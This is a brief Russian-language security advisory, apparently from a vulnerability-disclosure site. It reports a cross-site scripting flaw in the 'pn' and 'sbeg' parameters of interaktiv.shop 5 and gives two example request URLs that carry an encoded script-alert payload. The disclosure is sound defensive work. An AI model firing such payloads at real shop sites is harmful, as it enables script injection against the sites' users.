Программа: interaktiv.shop 5, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"pn" и "sbeg". Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольный код сценария в браузере жертвы в контексте
безопасности уязвимого сайта.

Пример:

/cgi-bin/interaktiv.shop/front/shop_main.cgi?func=det&wkid=41587822301246215&rub1=Footprints&rub2=Architect&artnr=114&pn=%22%3Cscript%3Ealert(‘r0t’)%3C/script%3E

/cgi-bin/interaktiv.shop/front/shop_main.cgi?func=searchdo&sfields=&wkid=41587822301246215&rub1_search=all&sfield=1&sbeg=%22%3Cscript%3Ealert(‘r0t’)%3C/script%3E

 



Оставить мнение